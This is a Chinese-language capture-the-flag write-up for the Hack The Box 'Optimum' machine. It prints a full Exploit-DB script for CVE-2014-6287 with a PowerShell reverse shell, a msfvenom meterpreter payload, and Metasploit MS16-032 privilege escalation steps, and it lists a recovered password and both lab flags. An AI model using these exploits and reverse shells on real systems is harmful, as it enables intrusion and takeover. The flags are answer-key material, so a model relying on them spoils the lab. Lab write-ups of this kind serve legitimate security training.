HTB:Optimum[WriteUP]
目录
连接至HTB服务器并启动靶机
1.Which version of HttpFileServer is running on TCP port 80?
使用nmap对靶机80端口进行脚本、服务信息扫描
直接使用浏览器可对靶机80端口访问
2.What is the 2014 CVE ID for a remote code execution vulnerability in the findMacroMarker function in HttpFileServer 2.3 version?
3.What user is the webserver running as? Provide the username without the domain.
4.Submit the flag located on the kostas user's desktop.
USER_FLAG:1d5409044d142fe837a56b407fe50973
5.Optional question: What is the password for the kostas user?
6.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?
7.Submit the flag located on the administrator's desktop.
ROOT_FLAG:937d8012afc7f718e2fd49a85d113f16
连接至HTB服务器并启动靶机
靶机IP:10.10.10.8
分配IP:10.10.16.8
1.Which version of HttpFileServer is running on TCP port 80
?
使用nmap对靶机进行全端口扫描
nmap -p- --min-rate=1500 -sS -T4 -Pn 10.10.10.8
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -sS -T4 -Pn 10.10.10.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-20 23:34 EDT
Nmap scan report for 10.10.10.8
Host is up (0.089s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 86.43 seconds
由扫描结果可见,靶机开放端口:80共1个端口
使用nmap对靶机80端口进行脚本、服务信息扫描
nmap -p 80 -sCV 10.10.10.8
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p 80 -sCV 10.10.10.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-20 23:37 EDT
Nmap scan report for 10.10.10.8
Host is up (0.11s latency).PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.90 seconds
由扫描结果可见,VERSION栏目下显示的服务版本为:2.3
直接使用浏览器可对靶机80端口访问
2.What is the 2014 CVE ID for a remote code execution vulnerability in the findMacroMarker
function in HttpFileServer 2.3 version?
使用searchsploit对该服务及其版本进行漏洞搜索
将Exp脚本复制到当前目录下
searchsploit -m windows/remote/49584.py
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m windows/remote/49584.py
Exploit: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
URL: https://www.exploit-db.com/exploits/49584
Path: /usr/share/exploitdb/exploits/windows/remote/49584.py
Codes: N/A
Verified: False
File Type: ASCII text, with very long lines (546)
Copied to: /home/kali/Desktop/temp/49584.py
使用strings命令查看该Exp内容
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# strings 49584.py
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
#!/usr/bin/python3
import base64
import os
import urllib.request
import urllib.parse
lhost = "10.10.10.1"
lport = 1111
rhost = "10.10.10.8"
rport = 80
# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()'
# Encode the command in base64 format
encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
print("\nEncoded the command in base64 format...")
# Define the payload to be included in the URL
payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'
# Encode the payload and send a HTTP GET request
encoded_payload = urllib.parse.quote_plus(payload)
url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
urllib.request.urlopen(url)
print("\nEncoded the payload and sent a HTTP GET request to the target...")
# Print some information
print("\nPrinting some information for debugging...")
print("lhost: ", lhost)
print("lport: ", lport)
print("rhost: ", rhost)
print("rport: ", rport)
print("payload: ", payload)
# Listen for connections
print("\nListening for connection...")
os.system(f'nc -nlvp {lport}')
由开头注释信息可见,该Exp基于漏洞:CVE-2014-6287编写
3.What user is the webserver running as? Provide the username without the domain.
在该Exp中,我们需要修改的变量为:lhost、lport、rhost、rport
修改完毕保存后,通过python运行该脚本
python3 49584.py
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python 49584.pyEncoded the command in base64 format...
Encoded the payload and sent a HTTP GET request to the target...
Printing some information for debugging...
lhost: 10.10.16.8
lport: 1425
rhost: 10.10.10.8
rport: 80
payload: exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AOAAiACwAMQA0ADIANQApADsAIAAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwAgAFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAIAB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAMAAsACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACAAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAkAGkAKQA7ACAAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAIAAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAgACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAIAAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAIAAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAIAAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=Listening for connection...
listening on [any] 1425 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.8] 49158
whoami
optimum\kostas
由执行的whoami命令回显可见,该Web服务器以kostas用户身份运行,optimum为域
4.Submit the flag located on the kostas user's desktop.
在当前连接的目录下可以直接找到user_flag
PS C:\Users\kostas\Desktop> ls
Directory: C:\Users\kostas\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 18/3/2017 2:11 ?? 760320 hfs.exe
-ar-- 27/10/2024 2:10 ?? 34 user.txt
PS C:\Users\kostas\Desktop> type user.txt
1d5409044d142fe837a56b407fe50973
USER_FLAG:1d5409044d142fe837a56b407fe50973
5.Optional question: What is the password for the kostas user?
在攻击机利用python启动一个http服务器,将winPEAS.exe上传至靶机
┌──(root㉿kali)-[/home/kali/Desktop/tool]
└─# ls
fscan impacket keepass-password-dumper lxd-alpine-builder nc.exe rogue-jndi
fscan.exe JSFinder.py linpeas.sh mimikatz.exe Responder winPEAS.exe
┌──(root㉿kali)-[/home/kali/Desktop/tool]
└─# python -m http.server 7777
Serving HTTP on 0.0.0.0 port 7777 (http://0.0.0.0:7777/) ...
10.10.10.8 - - [21/Oct/2024 00:17:25] "GET /winPEAS.exe HTTP/1.1" 200 -
靶机利用powershell连接下载
powershell.exe -Command "Invoke-WebRequest -Uri http://10.10.16.8:7777/winPEAS.exe -OutFile winPEAS.exe"
PS C:\Users\kostas\Desktop> ls
Directory: C:\Users\kostas\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 18/3/2017 2:11 ?? 760320 hfs.exe
-ar-- 27/10/2024 2:10 ?? 34 user.txt
PS C:\Users\kostas\Desktop> powershell.exe -Command "Invoke-WebRequest -Uri http://10.10.16.8:7777/winPEAS.exe -OutFile winPEAS.exe"
PS C:\Users\kostas\Desktop> ls
Directory: C:\Users\kostas\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 18/3/2017 2:11 ?? 760320 hfs.exe
-ar-- 27/10/2024 2:10 ?? 34 user.txt
-a--- 27/10/2024 3:03 ?? 2424320 winPEAS.exe
直接运行winPEAS
./winPEAS.exe
可以找到kostas的凭证,如果不想一条条翻着看可以Ctrl+Shift+F直接搜索password
用户:kostas
密码:kdeEjDowkS*
6.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?
根据题目提醒,启动msfconsole并搜索:post/multi/recon
可以确定是需要使用模块:local_exploit_suggester
use post/multi/recon/local_exploit_suggester
列出该模块需要填写的选项
show options
可以看到这里我们需要先提前拿到一个SESSION会话
7.Submit the flag located on the administrator's desktop.
查看靶机系统信息
systeminfo
PS C:\Users\kostas\Desktop> systeminfo
Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36 ??
System Boot Time: 27/10/2024, 2:08:35 ??
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
可见靶机为x64 Windows Server 2012 R2系统
直接利用msfvenom生成64位的马子(这里很关键,不然会影响后面提权)
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.8 LPORT=8686 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
靶机上下载shell.exe
PS C:\Users\kostas\Desktop> powershell.exe -Command "Invoke-WebRequest -Uri http://10.10.16.8:7777/shell.exe -OutFile shell.exe"
PS C:\Users\kostas\Desktop> ls
Directory: C:\Users\kostas\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 18/3/2017 2:11 ?? 760320 hfs.exe
-a--- 27/10/2024 3:28 ?? 73802 rs.exe
-a--- 27/10/2024 4:16 ?? 7168 shell.exe
-ar-- 27/10/2024 2:10 ?? 34 user.txt
-a--- 27/10/2024 3:03 ?? 2424320 winPEAS.exe
切换payload监听模块
use exploit/multi/handler
设置参数:LHOST、LPORT、PAYLOAD
msf6 exploit(multi/handler) > set LHOST 10.10.16.8
LHOST => 10.10.16.8msf6 exploit(multi/handler) > set LPORT 8686
LPORT => 8686msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
开始监听
msf6 exploit(multi/handler) > exploit
在靶机运行shell.exe文件后,MSF收到回显
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.16.8:8888
[*] Sending stage (176198 bytes) to 10.10.10.8
[*] Meterpreter session 4 opened (10.10.16.8:8888 -> 10.10.10.8:49168) at 2024-10-21 00:52:33 -0400meterpreter > getuid
Server username: OPTIMUM\kostas
将Meterpreter收进session中
meterpreter > background
[*] Backgrounding session 7...
切换到提权辅助模块
use post/multi/recon/local_exploit_suggester
因为我刚才执行background后会话标志为7,所以我这里设置SESSION为7
set SESSION 7
输入run或exploit开始扫描
我们在绿色模块中选取支持x64-2012-R2系统的提权模块尝试进行提权
经过反复测试只有windows/local/ms16_032_secondary_logon_handle_privesc能成功提权
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
列出该模块所有可填选项
列出可选目标参数
show targets
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show targets
Exploit targets:
=================Id Name
-- ----
=> 0 Windows x86
1 Windows x64
选择64位系统作为目标
set TARGET 1
将其他必要参数补齐后,直接exploit或者run运行该模块
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.16.8
LHOST => 10.10.16.8
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LPORT 333
LPORT => 333
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 7
SESSION => 7
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit
切换到cmd
meterpreter > shell
meterpreter > shell
Process 2780 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
进入C盘根目录下
cd C:\
查找root_flag位置
dir /s root.txt
C:\>dir /s root.txt
dir /s root.txt
Volume in drive C has no label.
Volume Serial Number is EE82-226DDirectory of C:\Users\Administrator\Desktop
27/10/2024 02:10 �� 34 root.txt
1 File(s) 34 bytesTotal Files Listed:
1 File(s) 34 bytes
0 Dir(s) 5.672.394.752 bytes free
查看root_flag内容
type C:\Users\Administrator\Desktop\root.txt
C:\>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
937d8012afc7f718e2fd49a85d113f16